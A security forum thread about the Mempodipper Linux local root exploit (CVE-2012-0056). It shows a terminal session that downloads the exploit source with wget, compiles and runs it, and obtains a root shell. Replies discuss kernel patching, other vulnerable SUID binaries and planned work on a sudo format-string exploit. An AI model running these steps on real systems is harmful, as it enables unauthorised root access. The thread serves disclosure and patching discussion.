Linux Local Root Via SUID /prod/pid/mem Write

h57xiucj2z946q

Linux Local Root Via SUID /prod/pid/mem Write

This is the Mempodipper local root exploit for Linux. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process's virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels greater than and equal to 2.6.39 are vulnerable.

http://packetstormsecurity.org/files/108973

Fresh install of Linux Mint 12, then updated to latest repositry sources using:

sudo apt-get update
sudo apt-get upgrade

damo@damo-XPS-M1530 ~ $ uname -a
Linux damo-XPS-M1530 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
damo@damo-XPS-M1530 ~ $ whoami
damo
damo@damo-XPS-M1530 ~ $ id
uid=1000(damo) gid=1000(damo) groups=1000(damo),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),125(sambashare)
damo@damo-XPS-M1530 ~ $ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
--2012-01-28 17:32:14-- http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Resolving git.zx2c4.com... 173.236.178.65, 2607:f298:2:122::2e0:9c2
Connecting to git.zx2c4.com|173.236.178.65|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7069 (6.9K) [text/plain]
Saving to: `mempodipper.c'

100%[===================================================================>] 7,069 36.0K/s in 0.2s

2012-01-28 17:32:15 (36.0 KB/s) - `mempodipper.c' saved [7069/7069]

damo@damo-XPS-M1530 ~ $ gcc mempodipper.c -o mempodipper
damo@damo-XPS-M1530 ~ $ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2791/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x8049564.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),125(sambashare),1000(damo)
# whoami
root
#

Running apt-get upgrade again:

damo@damo-XPS-M1530 ~ $ sudo apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
linux-generic linux-headers-generic linux-image-generic
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
damo@damo-XPS-M1530 ~ $

However you can upgrade your kernel by executing:

sudo apt-get dist-upgrade

infodox

I have had a python version of this for a while, nice to know the "real" version was released. The .py version relies on an unusual python module that most installs are missing

This was just patched BTW, in the latest kernel sources. I dunno why author finally released, he was planning on sitting on it for AGES.

There is also an nginx remote in the wild (0day, waiting on a sample) so take care!

h57xiucj2z946q

infodox wrote: »

This was just patched BTW, in the latest kernel sources.

Aye, that's why I was saying you can update your kernel above

infodox

Oddly enough, exploit only works on "new but not newest" kernels. Which is REALLY unusual, but after reading the information on the exploit before a PoC was made public it makes sense - the removal of a couple of #ifdefs rendered that "interface" vuln to this.

su is not the only binary vuln either, there are a few SUID binaries that this can work on... I am betting passwd is vuln because it behaves the same, not sure of ASLR is enabled on the .text section in it either

infodox

http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt

Working on an exploit tonight... Should have something by Wednesday

BaconZombie

BaconZombie

Look like there is a bounty open already:

@joernchen

Bug Bounty: 1 crate of beer for the first reliable exploit for CVE-2012-0809 (sudo 1.8 format string) WITH FORTIFY_SOURCE & ASLR enabled :-)

https://twitter.com/#!/joernchen/status/164038779743645696

infodox wrote: »

http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt

Working on an exploit tonight... Should have something by Wednesday